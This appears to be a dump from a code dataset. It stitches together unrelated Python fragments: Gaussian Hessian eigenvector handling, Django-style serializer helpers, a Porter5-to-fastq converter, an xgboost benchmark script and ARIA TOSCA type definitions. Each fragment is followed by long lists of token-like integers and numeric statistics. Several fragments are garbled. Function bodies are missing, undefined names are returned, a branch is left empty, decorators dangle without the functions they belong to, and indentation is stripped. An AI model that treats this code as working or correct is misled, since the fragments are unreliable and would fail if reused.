# Check available data and retrieve what may be needed
if get_evec:
if hessvec is None and fccart is None:
read_data.append('hessvec')
# if (not mweigh) and atmass is None:
# read_data.append('atmas')
if atmass is None:
read_data.append('atmas')
if get_eval:
if hessval is None and fccart is None:
read_data.append('hessval')
if len(read_data) > 0:
if dfobj is None:
raise IOError('Missing checkpoint file to extract necessary data')
idx = read_data.index('hessvec')
dfdata = {}
if idx >= 0:
try:
dfdata.update(get_data(dfobj, 'hessvec'))
read_data.pop(idx)
except IndexError:
read_data[idx] = ep.build_qlabel(1, None, 2, 'X')
if 'atmas' not in read_data:
read_data.append('atmas')
dfdata.update(get_data(dfobj, *read_data))
eigvec, eigval = None, None
if get_evec:
if atmass is None:
atmas = np.repeat(np.array(dfdata['atmas']), 3)
else:
atmas = np.repeat(np.array(atmass), 3)
if hessvec is not None or 'hessvec' in dfdata:
if hessvec is not None:
eigvec = np.array(hessvec).reshape((3*natoms, -1), order='F')
else:
eigvec = np.array(dfdata['hessvec']).reshape((3*natoms, -1),
order='F')
redmas = np.einsum('ij,ij,i->j', eigvec, eigvec, atmas)
if mweigh:
# Simply correct the normalization, already weighted by default
eigvec[:, ...] = eigvec[:, ...] / np.sqrt(redmas)
else:
eigvec[:, ...] = eigvec[:, ...]*np.sqrt(atmas) / \
np.sqrt(redmas)
else:
raise NotImplementedError('Diagonalization NYI')
if get_eval:
if hessval is not None or 'hessval' in dfdata:
if hessval is not None:
eigval = np.array(hessval)
else:
eigval = np.array(dfdata['hessval'])
else:
raise NotImplementedError('Diagonalization NYI')
# We transpose eigvec to have a C/Python compliant data order
return eigvec.transpose(), eigval
| [
37811,
20535,
12,
5715,
4560,
319,
12822,
31562,
39559,
26954,
3696,
13,
198,
198,
15946,
1460,
1877,
12,
5715,
20314,
284,
18510,
14,
2302,
974,
1366,
287,
12822,
31562,
198,
220,
39559,
26954,
3696,
13,
198,
198,
29021,
198,
35937,
19... | 1.972121 | 21,593 |
def _attrgetter_with_default(attr, default):
"""
It returns a function that can be called with an object to get the value
of attr or the default.
Useful to convert None values to ''.
"""
return _getter
def id_name_dict(obj):
"""Creates dictionary with selected field from supplied object."""
if obj is None:
return None
return {
'id': str(obj.id),
'name': obj.name,
}
def id_name_list_of_dicts(manager):
"""Creates a list of dicts with ID and name keys from a manager."""
return _list_of_dicts(id_name_dict, manager)
def id_type_dict(obj):
"""Creates dictionary with selected field from supplied object."""
if obj is None:
return None
return {
'id': str(obj.id),
'type': obj.type,
}
def id_uri_dict(obj):
"""Creates dictionary with selected field from supplied object."""
if obj is None:
return None
return {
'id': str(obj.id),
'uri': obj.uri,
}
def address_dict(obj, prefix='address'):
"""
Creates a dictionary for the address fields with the given prefix
to be used as nested object.
"""
if obj is None:
return None
mapping = {
'line_1': _attrgetter_with_default(f'{prefix}_1', ''),
'line_2': _attrgetter_with_default(f'{prefix}_2', ''),
'town': _attrgetter_with_default(f'{prefix}_town', ''),
'county': _attrgetter_with_default(f'{prefix}_county', ''),
'postcode': _attrgetter_with_default(f'{prefix}_postcode', ''),
'area': lambda obj: id_name_dict(
getattr(obj, f'{prefix}_area'),
),
'country': lambda obj: id_name_dict(
getattr(obj, f'{prefix}_country'),
),
}
address = {
target_source_name: value_getter(obj)
for target_source_name, value_getter in mapping.items()
}
if any(address.values()):
return address
return None
def company_dict(obj):
"""Creates dictionary for a company field."""
if obj is None:
return None
return {
'id': str(obj.id),
'name': obj.name,
'trading_names': obj.trading_names,
}
def contact_or_adviser_dict(obj, include_dit_team=False):
"""Creates dictionary with selected field from supplied object."""
if obj is None:
return None
data = {
'id': str(obj.id),
'first_name': obj.first_name,
'last_name': obj.last_name,
'name': obj.name,
}
if include_dit_team:
if obj.dit_team:
data['dit_team'] = id_name_dict(obj.dit_team)
else:
data['dit_team'] = {}
return data
def contact_or_adviser_list_of_dicts(manager):
"""Creates a list of dicts from a manager for contacts or advisers."""
return _list_of_dicts(contact_or_adviser_dict, manager)
def adviser_dict_with_team(obj):
"""Creates a dictionary with adviser names fields and the adviser's team."""
return contact_or_adviser_dict(obj, include_dit_team=True)
def _computed_nested_dict(nested_field, dict_func):
"""Creates a dictionary from a nested field using dict_func."""
return get_dict
def computed_field_function(function_name, dict_func):
"""Create a dictionary from a result of provided function call."""
return get_dict
def computed_nested_id_name_dict(nested_field):
"""Creates a dictionary with id and name from a nested field."""
return _computed_nested_dict(nested_field, id_name_dict)
def computed_nested_sector_dict(nested_field):
"""Creates a dictionary for a sector from from a nested field."""
return _computed_nested_dict(nested_field, sector_dict)
def ch_company_dict(obj):
"""Creates dictionary from a company with id and company_number keys."""
if obj is None:
return None
return {
'id': str(obj.id),
'company_number': obj.company_number,
}
def investment_project_dict(obj):
"""Creates dictionary from an investment project containing id, name and project_code."""
if obj is None:
return None
return {
'id': str(obj.id),
'name': obj.name,
'project_code': obj.project_code,
}
def sector_dict(obj):
"""Creates a dictionary for a sector."""
if obj is None:
return None
return {
'id': str(obj.id),
'name': obj.name,
'ancestors': [{
'id': str(ancestor.id),
} for ancestor in obj.get_ancestors()],
}
def interaction_dict(obj):
"""Creates a dictionary for an interaction."""
if obj is None:
return None
return {
'id': str(obj.id),
'date': obj.date,
'subject': obj.subject,
}
def _list_of_dicts(dict_factory, manager):
"""Creates a list of dicts with ID and name keys from a manager."""
return [dict_factory(obj) for obj in manager.all()]
| [
4299,
4808,
35226,
1136,
353,
62,
4480,
62,
12286,
7,
35226,
11,
4277,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
632,
5860,
257,
2163,
326,
460,
307,
1444,
351,
281,
2134,
284,
651,
262,
1988,
198,
220,
220,
220,
286,
7... | 2.42716 | 2,025 |
#If using biowulf, one has to configure an enviornment that contains pandas, as it doesn't seem to be(?) an availible module with python3
#example, type something like this:
#source /data/belfordak/Buck_lab/conda/etc/profile.d/conda.sh
#conda activate base
#conda activate all_libs (just an env with pandas and other packages)
#done with: conda create -n all_libs python=3.6 numpy scipy pandas biopython
#python
#this script produces the fastqish file from the Porter5 output
#!/usr/bin/env python
import numpy as np
from math import *
import pandas as pd
import sys, re, os
import csv
infile = pd.read_csv(sys.argv[1],delimiter = '\t' )
#verified works
maxval= infile.iloc[:,3:-1].max(axis=1) #to work for both ss3 and ss8
phred_calc = (-10)*np.log10(1-(maxval))
infile['phred_calc'] = phred_calc
#for ASCII generation from phred score:
my_dictionary= {
(0) : '!',
(1) : '\"',
(2) : '#',
(3) : '$',
(4) : '%',
(5) : '&',
(6) : "\'",
(7) : '(',
(8) : ')',
(9) : '*',
(10) : '+',
(11) : ',',
(12) : '-',
(13) : '.',
(14) : '/',
(15) : '0',
(16) : '1',
(17) : '2',
(18) : '3',
(19) : '4',
(20) : '5',
(21) : '6',
(22) : '7',
(23) : '8',
(24) : '9',
(25) : ':',
(26) : ';',
(27) : '<',
(28) : '=',
(29) : '>',
(30) : '?',
(31) : '@',
(32) : 'A',
(33) : 'B',
(34) : 'C',
(35) : 'D',
(36) : 'E',
(37) : 'F',
(38) : 'G',
(39) : 'H',
(40) : 'I',
(41) : 'J',
(42) : 'K'
}
ASCII = infile['phred_calc'].apply(np.floor)
# with var assignment
infile['ASCII']= ASCII.map(my_dictionary)
#Transposing
infile_transposed_in = infile.T
#print(infile_transposed_in)
fastqish_but_cols = infile_transposed_in.loc[['SS', 'ASCII'],:]
concat_test_temp = pd.Series(fastqish_but_cols.fillna('').values.tolist()).str.join('')
concat_test = np.array(concat_test_temp)
#Part 2: pulling seq names and "+" separator (lines 0 and 2)
infile_name = sys.argv[1]
#1. read in temp_porter5_submission.swarm as list_seq_XX
#note: I'm not sure if this will be the final path (maybe we'll want it back 1 dir?)
#all_seqs.list created in pre_pre_processing script
with open("temp_porter5_submission.swarm") as f:
list_seq_XX = f.readlines()
list_seq_XX = [x.strip() for x in list_seq_XX]
y = sorted(list_seq_XX, key = lambda item: int(item.partition('_')[2].partition('.')[0]))
#print(y) above was for sorting so order was ...9,10,11,12 instead of 9,10,100,101, etc. Lib would have been incorrect otherwise
# for getting rid of .fasta. We're going to just use the seq_00 part to search in dict
x = []
for line in y:
part = line.split(".")
#x = part[0]
#print(x)
x.append(part[0])
#print(x)
list_seq_XX_fin = x
#2. read original.fa as list, but only lines that start with ">"
original_fasta = sys.argv[2]
with open(original_fasta,"r") as f:
id_temp = []
for ln in f:
if ln.startswith(">"):
x = ln
id_temp.append(x)
list_seq_fa_orig = [x.strip() for x in id_temp]
#3. dictionary from the two lists
keys = list_seq_XX_fin #id_temp_clean in test
values = list_seq_fa_orig
dict_for_name_appends = dict(zip(keys, values))
#3.5 make index file
with open('index_file.csv', 'w') as f:
write_dict = csv.writer(f)
for key, value in dict_for_name_appends.items():
write_dict.writerow([key, value])
#4 parse file name for key val search
sep = os.path.basename(infile_name).split('.')[0]
#5. if filename = key, print value as line 0 in file
#replace > with @
dict_var = dict_for_name_appends[sep]
temp = list(dict_var)
temp[0] = "@"
dict_var = "".join(temp)
#print(dict_var)
f_out = open((infile_name + '.fastqish'), 'w')
f_out.write(str(dict_var + "\n" + concat_test[0] + "\n" + "+" + "\n" +concat_test[1]))
f_out.close()
| [
2,
1532,
1262,
3182,
322,
4754,
11,
530,
468,
284,
17425,
281,
551,
8903,
1211,
434,
326,
4909,
19798,
292,
11,
355,
340,
1595,
470,
1283,
284,
307,
7,
10091,
281,
29107,
856,
8265,
351,
21015,
18,
198,
2,
20688,
11,
2099,
1223,
5... | 2.221837 | 1,731 |
# Copyright (C) 2020 Intel Corporation
#
# SPDX-License-Identifier: MIT
import argparse
from bench import (
parse_args, measure_function_time, load_data, print_output,
accuracy_score, rmse_score
)
import numpy as np
import xgboost as xgb
import os
parser = argparse.ArgumentParser(description='xgboost gradient boosted trees '
'benchmark')
parser.add_argument('--n-estimators', type=int, default=100,
help='Number of gradient boosted trees')
parser.add_argument('--learning-rate', '--eta', type=float, default=0.3,
help='Step size shrinkage used in update '
'to prevents overfitting')
parser.add_argument('--min-split-loss', '--gamma', type=float, default=0,
help='Minimum loss reduction required to make'
' partition on a leaf node')
parser.add_argument('--max-depth', type=int, default=6,
help='Maximum depth of a tree')
parser.add_argument('--min-child-weight', type=float, default=1,
help='Minimum sum of instance weight needed in a child')
parser.add_argument('--max-delta-step', type=float, default=0,
help='Maximum delta step we allow each leaf output to be')
parser.add_argument('--subsample', type=float, default=1,
help='Subsample ratio of the training instances')
parser.add_argument('--colsample-bytree', type=float, default=1,
help='Subsample ratio of columns '
'when constructing each tree')
parser.add_argument('--reg-lambda', type=float, default=1,
help='L2 regularization term on weights')
parser.add_argument('--reg-alpha', type=float, default=0,
help='L1 regularization term on weights')
parser.add_argument('--tree-method', type=str, required=True,
help='The tree construction algorithm used in XGBoost')
parser.add_argument('--scale-pos-weight', type=float, default=1,
help='Controls a balance of positive and negative weights')
parser.add_argument('--grow-policy', type=str, default='depthwise',
help='Controls a way new nodes are added to the tree')
parser.add_argument('--max-leaves', type=int, default=0,
help='Maximum number of nodes to be added')
parser.add_argument('--max-bin', type=int, default=256,
help='Maximum number of discrete bins to '
'bucket continuous features')
parser.add_argument('--objective', type=str, required=True,
choices=('reg:squarederror', 'binary:logistic',
'multi:softmax', 'multi:softprob'),
help='Control a balance of positive and negative weights')
parser.add_argument('--count-dmatrix', default=False, action='store_true',
help='Count DMatrix creation in time measurements')
parser.add_argument('--single-precision-histogram', default=False, action='store_true',
help='Build histograms instead of double precision')
parser.add_argument('--enable-experimental-json-serialization', default=True,
choices=('True', 'False'), help='Use JSON to store memory snapshots')
params = parse_args(parser)
# Load and convert data
X_train, X_test, y_train, y_test = load_data(params)
xgb_params = {
'booster': 'gbtree',
'verbosity': 0,
'learning_rate': params.learning_rate,
'min_split_loss': params.min_split_loss,
'max_depth': params.max_depth,
'min_child_weight': params.min_child_weight,
'max_delta_step': params.max_delta_step,
'subsample': params.subsample,
'sampling_method': 'uniform',
'colsample_bytree': params.colsample_bytree,
'colsample_bylevel': 1,
'colsample_bynode': 1,
'reg_lambda': params.reg_lambda,
'reg_alpha': params.reg_alpha,
'tree_method': params.tree_method,
'scale_pos_weight': params.scale_pos_weight,
'grow_policy': params.grow_policy,
'max_leaves': params.max_leaves,
'max_bin': params.max_bin,
'objective': params.objective,
'seed': params.seed,
'single_precision_histogram': params.single_precision_histogram,
'enable_experimental_json_serialization': params.enable_experimental_json_serialization
}
if params.threads != -1:
xgb_params.update({'nthread': params.threads})
if 'OMP_NUM_THREADS' in os.environ.keys():
xgb_params['nthread'] = int(os.environ['OMP_NUM_THREADS'])
columns = ('batch', 'arch', 'prefix', 'function', 'threads', 'dtype', 'size',
'num_trees')
if params.objective.startswith('reg'):
task = 'regression'
metric_name, metric_func = 'rmse', rmse_score
columns += ('rmse', 'time')
else:
task = 'classification'
metric_name = 'accuracy[%]'
metric_func = lambda y1, y2: 100 * accuracy_score(y1, y2)
columns += ('n_classes', 'accuracy', 'time')
if 'cudf' in str(type(y_train)):
params.n_classes = y_train[y_train.columns[0]].nunique()
else:
params.n_classes = len(np.unique(y_train))
if params.n_classes > 2:
xgb_params['num_class'] = params.n_classes
dtrain = xgb.DMatrix(X_train, y_train)
dtest = xgb.DMatrix(X_test, y_test)
if params.count_dmatrix:
else:
fit_time, booster = measure_function_time(fit, params=params)
y_pred = convert_xgb_predictions(booster.predict(dtrain), params.objective)
train_metric = metric_func(y_pred, y_train)
predict_time, y_pred = measure_function_time(predict, params=params)
test_metric = metric_func(
convert_xgb_predictions(y_pred, params.objective), y_test)
print_output(library='xgboost', algorithm=f'gradient_boosted_trees_{task}',
stages=['training', 'prediction'], columns=columns,
params=params, functions=['gbt.fit', 'gbt.predict'],
times=[fit_time, predict_time], accuracy_type=metric_name,
accuracies=[train_metric, test_metric], data=[X_train, X_test],
alg_instance=booster)
| [
2,
15069,
357,
34,
8,
12131,
8180,
10501,
198,
2,
198,
2,
30628,
55,
12,
34156,
12,
33234,
7483,
25,
17168,
198,
198,
11748,
1822,
29572,
198,
6738,
7624,
1330,
357,
198,
220,
220,
220,
21136,
62,
22046,
11,
3953,
62,
8818,
62,
24... | 2.419265 | 2,502 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from aria.utils.collections import (FrozenDict, FrozenList)
from aria.utils.caching import cachedmethod
from aria.parser import implements_specification
from aria.parser.presentation import (has_fields, allow_unknown_fields, primitive_field,
primitive_list_field, object_field, object_dict_field,
object_list_field, object_sequenced_list_field,
object_dict_unknown_fields, field_getter, field_validator,
list_type_validator, derived_from_validator,
get_parent_presentation)
from .assignments import ArtifactAssignmentForType
from .data_types import Version
from .definitions import (PropertyDefinition, AttributeDefinition, InterfaceDefinition,
RequirementDefinition, CapabilityDefinition, OperationDefinition)
from .misc import (Description, ConstraintClause)
from .modeling.artifacts import get_inherited_artifact_definitions
from .modeling.capabilities import (get_inherited_valid_source_types,
get_inherited_capability_definitions)
from .modeling.data_types import (get_data_type, get_inherited_constraints, coerce_data_type_value,
validate_data_type_name)
from .modeling.interfaces import (get_inherited_interface_definitions, get_inherited_operations)
from .modeling.groups import get_inherited_members
from .modeling.policies import get_inherited_targets
from .modeling.parameters import get_inherited_parameter_definitions
from .modeling.requirements import get_inherited_requirement_definitions
from .presentation.extensible import ExtensiblePresentation
from .presentation.field_getters import data_type_class_getter
from .presentation.field_validators import (data_type_derived_from_validator,
data_type_constraints_validator,
data_type_properties_validator,
list_node_type_or_group_type_validator)
from .presentation.types import convert_name_to_full_type_name
@has_fields
@implements_specification('3.6.3', 'tosca-simple-1.0')
class ArtifactType(ExtensiblePresentation):
"""
An Artifact Type is a reusable entity that defines the type of one or more files that are used
to define implementation or deployment artifacts that are referenced by nodes or relationships
on their operations.
See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
/TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
#DEFN_ENTITY_ARTIFACT_TYPE>`__
"""
@field_validator(derived_from_validator(convert_name_to_full_type_name, 'artifact_types'))
@primitive_field(str)
def derived_from(self):
"""
An optional parent Artifact Type name the Artifact Type derives from.
:type: :obj:`basestring`
"""
@field_getter(data_type_class_getter(Version))
@primitive_field(str)
def version(self):
"""
An optional version for the Artifact Type definition.
:type: :class:`Version`
"""
@object_field(Description)
def description(self):
"""
An optional description for the Artifact Type.
:type: :class:`Description`
"""
@primitive_field(str)
def mime_type(self):
"""
The required mime type property for the Artifact Type.
:type: :obj:`basestring`
"""
@primitive_list_field(str)
def file_ext(self):
"""
The required file extension property for the Artifact Type.
:type: [:obj:`basestring`]
"""
@object_dict_field(PropertyDefinition)
def properties(self):
"""
An optional list of property definitions for the Artifact Type.
:type: {:obj:`basestring`: :class:`PropertyDefinition`}
"""
@cachedmethod
@cachedmethod
@has_fields
@implements_specification('3.6.5', 'tosca-simple-1.0')
class DataType(ExtensiblePresentation):
"""
A Data Type definition defines the schema for new named datatypes in TOSCA.
See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
/TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
#DEFN_ENTITY_DATA_TYPE>`__
"""
@field_validator(data_type_derived_from_validator)
@primitive_field(str)
def derived_from(self):
"""
The optional key used when a datatype is derived from an existing TOSCA Data Type.
:type: :obj:`basestring`
"""
@field_getter(data_type_class_getter(Version))
@primitive_field(str)
def version(self):
"""
An optional version for the Data Type definition.
:type: :class:`Version`
"""
@object_field(Description)
def description(self):
"""
The optional description for the Data Type.
:type: :class:`Description`
"""
@field_validator(data_type_constraints_validator)
@object_list_field(ConstraintClause)
def constraints(self):
"""
The optional list of sequenced constraint clauses for the Data Type.
:type: list of (str, :class:`ConstraintClause`)
"""
@field_validator(data_type_properties_validator)
@object_dict_field(PropertyDefinition)
def properties(self):
"""
The optional list property definitions that comprise the schema for a complex Data Type in
TOSCA.
:type: {:obj:`basestring`: :class:`PropertyDefinition`}
"""
@cachedmethod
@cachedmethod
@cachedmethod
@cachedmethod
@cachedmethod
@has_fields
@implements_specification('3.6.6', 'tosca-simple-1.0')
class CapabilityType(ExtensiblePresentation):
"""
A Capability Type is a reusable entity that describes a kind of capability that a Node Type can
declare to expose. Requirements (implicit or explicit) that are declared as part of one node can
be matched to (i.e., fulfilled by) the Capabilities declared by another node.
See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
/TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
#DEFN_ENTITY_CAPABILITY_TYPE>`__
"""
@field_validator(derived_from_validator(convert_name_to_full_type_name, 'capability_types'))
@primitive_field(str)
def derived_from(self):
"""
An optional parent capability type name this new Capability Type derives from.
:type: :obj:`basestring`
"""
@field_getter(data_type_class_getter(Version))
@primitive_field(str)
def version(self):
"""
An optional version for the Capability Type definition.
:type: :class:`Version`
"""
@object_field(Description)
def description(self):
"""
An optional description for the Capability Type.
:type: :class:`Description`
"""
@object_dict_field(PropertyDefinition)
def properties(self):
"""
An optional list of property definitions for the Capability Type.
ARIA NOTE: The spec says 'list', but the examples are all of dicts.
:type: {:obj:`basestring`: :class:`PropertyDefinition`}
"""
@object_dict_field(AttributeDefinition)
def attributes(self):
"""
An optional list of attribute definitions for the Capability Type.
:type: {:obj:`basestring`: :class:`AttributeDefinition`}
"""
@field_validator(list_type_validator('node type', convert_name_to_full_type_name, 'node_types'))
@primitive_list_field(str)
def valid_source_types(self):
"""
An optional list of one or more valid names of Node Types that are supported as valid
sources of any relationship established to the declared Capability Type.
:type: [:obj:`basestring`]
"""
@cachedmethod
@cachedmethod
def _is_descendant(self, context, other_type):
"""
Checks if ``other_type`` is our descendant (or equal to us).
"""
if other_type is None:
return False
elif other_type._name == self._name:
return True
return self._is_descendant(context, other_type._get_parent(context))
@cachedmethod
@cachedmethod
@cachedmethod
@allow_unknown_fields
@has_fields
@implements_specification('3.6.4', 'tosca-simple-1.0')
class InterfaceType(ExtensiblePresentation):
"""
An Interface Type is a reusable entity that describes a set of operations that can be used to
interact with or manage a node or relationship in a TOSCA topology.
See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
/TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
#DEFN_ENTITY_INTERFACE_TYPE>`__
"""
@field_validator(derived_from_validator(convert_name_to_full_type_name, 'interface_types'))
@primitive_field(str)
def derived_from(self):
"""
An optional parent Interface Type name this new Interface Type derives from.
:type: :obj:`basestring`
"""
@field_getter(data_type_class_getter(Version))
@primitive_field(str)
def version(self):
"""
An optional version for the Interface Type definition.
:type: :class:`Version`
"""
@object_field(Description)
def description(self):
"""
An optional description for the Interface Type.
:type: :class:`Description`
"""
@object_dict_field(PropertyDefinition)
def inputs(self):
"""
The optional list of input parameter definitions.
:type: {:obj:`basestring`: :class:`PropertyDefinition`}
"""
@object_dict_unknown_fields(OperationDefinition)
def operations(self):
"""
:type: {:obj:`basestring`: :class:`OperationDefinition`}
"""
@cachedmethod
@cachedmethod
@cachedmethod
@cachedmethod
@has_fields
@implements_specification('3.6.9', 'tosca-simple-1.0')
class RelationshipType(ExtensiblePresentation):
"""
A Relationship Type is a reusable entity that defines the type of one or more relationships
between Node Types or Node Templates.
See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
/TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
#DEFN_ENTITY_RELATIONSHIP_TYPE>`__
"""
@field_validator(derived_from_validator(convert_name_to_full_type_name, 'relationship_types'))
@primitive_field(str)
def derived_from(self):
"""
An optional parent Relationship Type name the Relationship Type derives from.
:type: :obj:`basestring`
"""
@field_getter(data_type_class_getter(Version))
@primitive_field(str)
def version(self):
"""
An optional version for the Relationship Type definition.
:type: :class:`Version`
"""
@object_field(Description)
def description(self):
"""
An optional description for the Relationship Type.
:type: :class:`Description`
"""
@object_dict_field(PropertyDefinition)
def properties(self):
"""
An optional list of property definitions for the Relationship Type.
:type: {:obj:`basestring`: :class:`PropertyDefinition`}
"""
@object_dict_field(AttributeDefinition)
def attributes(self):
"""
An optional list of attribute definitions for the Relationship Type.
:type: {:obj:`basestring`: :class:`AttributeDefinition`}
"""
@object_dict_field(InterfaceDefinition)
def interfaces(self):
"""
An optional list of interface definitions interfaces supported by the Relationship Type.
:type: {:obj:`basestring`: :class:`InterfaceDefinition`}
"""
@field_validator(list_type_validator('capability type', convert_name_to_full_type_name,
'capability_types'))
@primitive_list_field(str)
def valid_target_types(self):
"""
An optional list of one or more names of Capability Types that are valid targets for this
relationship.
:type: [:obj:`basestring`]
"""
@cachedmethod
@cachedmethod
def _is_descendant(self, context, the_type):
"""
Checks if ``other_type`` is our descendant (or equal to us).
"""
if the_type is None:
return False
elif the_type._name == self._name:
return True
return self._is_descendant(context, the_type._get_parent(context))
@cachedmethod
@cachedmethod
@cachedmethod
@has_fields
@implements_specification('3.6.8', 'tosca-simple-1.0')
class NodeType(ExtensiblePresentation):
"""
A Node Type is a reusable entity that defines the type of one or more Node Templates. As such, a
Node Type defines the structure of observable properties via a Properties Definition, the
Requirements and Capabilities of the node as well as its supported interfaces.
See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
/TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
#DEFN_ENTITY_NODE_TYPE>`__
"""
@field_validator(derived_from_validator(convert_name_to_full_type_name, 'node_types'))
@primitive_field(str)
def derived_from(self):
"""
An optional parent Node Type name this new Node Type derives from.
:type: :obj:`basestring`
"""
@field_getter(data_type_class_getter(Version))
@primitive_field(str)
def version(self):
"""
An optional version for the Node Type definition.
:type: :class:`Version`
"""
@object_field(Description)
def description(self):
"""
An optional description for the Node Type.
:type: :class:`Description`
"""
@object_dict_field(PropertyDefinition)
def properties(self):
"""
An optional list of property definitions for the Node Type.
:type: {:obj:`basestring`: :class:`PropertyDefinition`}
"""
@object_dict_field(AttributeDefinition)
def attributes(self):
"""
An optional list of attribute definitions for the Node Type.
:type: {:obj:`basestring`: :class:`AttributeDefinition`}
"""
@object_sequenced_list_field(RequirementDefinition)
def requirements(self):
"""
An optional sequenced list of requirement definitions for the Node Type.
ARIA NOTE: The spec seems wrong to make this a sequenced list. It seems that when you have
more than one requirement of the same name, behavior is undefined. The idea is to use the
"occurrences" field if you need to limit the number of requirement assignments.
:type: list of (str, :class:`RequirementDefinition`)
"""
@object_dict_field(CapabilityDefinition)
def capabilities(self):
"""
An optional list of capability definitions for the Node Type.
:type: list of :class:`CapabilityDefinition`
"""
@object_dict_field(InterfaceDefinition)
def interfaces(self):
"""
An optional list of interface definitions supported by the Node Type.
:type: {:obj:`basestring`: :class:`InterfaceDefinition`}
"""
@object_dict_field(ArtifactAssignmentForType)
def artifacts(self):
"""
An optional list of named artifact definitions for the Node Type.
:type: {:obj:`basestring`: :class:`ArtifactAssignmentForType`}
"""
@cachedmethod
@cachedmethod
def _is_descendant(self, context, the_type):
"""
Checks if ``other_type`` is our descendant (or equal to us).
"""
if the_type is None:
return False
elif the_type._name == self._name:
return True
return self._is_descendant(context, the_type._get_parent(context))
@cachedmethod
@cachedmethod
@cachedmethod
@cachedmethod
@cachedmethod
@cachedmethod
@has_fields
@implements_specification('3.6.10', 'tosca-simple-1.0')
class GroupType(ExtensiblePresentation):
"""
A Group Type defines logical grouping types for nodes, typically for different management
purposes. Groups can effectively be viewed as logical nodes that are not part of the physical
deployment topology of an application, yet can have capabilities and the ability to attach
policies and interfaces that can be applied (depending on the group type) to its member nodes.
Conceptually, group definitions allow the creation of logical "membership" relationships to
nodes in a service template that are not a part of the application's explicit requirement
dependencies in the topology template (i.e. those required to actually get the application
deployed and running). Instead, such logical membership allows for the introduction of things
such as group management and uniform application of policies (i.e., requirements that are also
not bound to the application itself) to the group's members.
See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
/TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
#DEFN_ENTITY_GROUP_TYPE>`__
"""
@field_validator(derived_from_validator(convert_name_to_full_type_name, 'group_types'))
@primitive_field(str)
def derived_from(self):
"""
An optional parent Group Type name the Group Type derives from.
:type: :obj:`basestring`
"""
@field_getter(data_type_class_getter(Version))
@primitive_field(str)
def version(self):
"""
An optional version for the Group Type definition.
:type: :class:`Version`
"""
@object_field(Description)
def description(self):
"""
The optional description for the Group Type.
:type: :class:`Description`
"""
@object_dict_field(PropertyDefinition)
def properties(self):
"""
An optional list of property definitions for the Group Type.
:type: {:obj:`basestring`: :class:`PropertyDefinition`}
"""
@field_validator(list_type_validator('node type', convert_name_to_full_type_name, 'node_types'))
@primitive_list_field(str)
def members(self):
"""
An optional list of one or more names of Node Types that are valid (allowed) as members of
the Group Type.
Note: This can be viewed by TOSCA Orchestrators as an implied relationship from the listed
members nodes to the group, but one that does not have operational lifecycle considerations.
For example, if we were to name this as an explicit Relationship Type we might call this
"MemberOf" (group).
:type: [:obj:`basestring`]
"""
@object_dict_field(InterfaceDefinition)
def interfaces(self):
"""
An optional list of interface definitions supported by the Group Type.
:type: {:obj:`basestring`: :class:`InterfaceDefinition`}
"""
@cachedmethod
@cachedmethod
def _is_descendant(self, context, the_type):
"""
Checks if ``other_type`` is our descendant (or equal to us).
"""
if the_type is None:
return False
elif the_type._name == self._name:
return True
return self._is_descendant(context, the_type._get_parent(context))
@cachedmethod
@cachedmethod
@cachedmethod
@has_fields
@implements_specification('3.6.11', 'tosca-simple-1.0')
class PolicyType(ExtensiblePresentation):
"""
A Policy Type defines a type of requirement that affects or governs an application or service's
topology at some stage of its lifecycle, but is not explicitly part of the topology itself
(i.e., it does not prevent the application or service from being deployed or run if it did not
exist).
See the `TOSCA Simple Profile v1.0 cos01 specification <http://docs.oasis-open.org/tosca
/TOSCA-Simple-Profile-YAML/v1.0/cos01/TOSCA-Simple-Profile-YAML-v1.0-cos01.html
#DEFN_ENTITY_POLICY_TYPE>`__
"""
@field_validator(derived_from_validator(convert_name_to_full_type_name, 'policy_types'))
@primitive_field(str)
def derived_from(self):
"""
An optional parent Policy Type name the Policy Type derives from.
:type: :obj:`basestring`
"""
@field_getter(data_type_class_getter(Version))
@primitive_field(str)
def version(self):
"""
An optional version for the Policy Type definition.
:type: :class:`Version`
"""
@object_field(Description)
def description(self):
"""
The optional description for the Policy Type.
:type: :class:`Description`
"""
@object_dict_field(PropertyDefinition)
def properties(self):
"""
An optional list of property definitions for the Policy Type.
:type: :class:`PropertyDefinition`
"""
@field_validator(list_node_type_or_group_type_validator)
@primitive_list_field(str)
def targets(self):
"""
An optional list of valid Node Types or Group Types the Policy Type can be applied to.
Note: This can be viewed by TOSCA Orchestrators as an implied relationship to the target
nodes, but one that does not have operational lifecycle considerations. For example, if we
were to name this as an explicit Relationship Type we might call this "AppliesTo" (node or
group).
:type: [:obj:`basestring`]
"""
@cachedmethod
@cachedmethod
@cachedmethod
| [
2,
49962,
284,
262,
24843,
10442,
5693,
357,
1921,
37,
8,
739,
530,
393,
517,
198,
2,
18920,
5964,
11704,
13,
220,
4091,
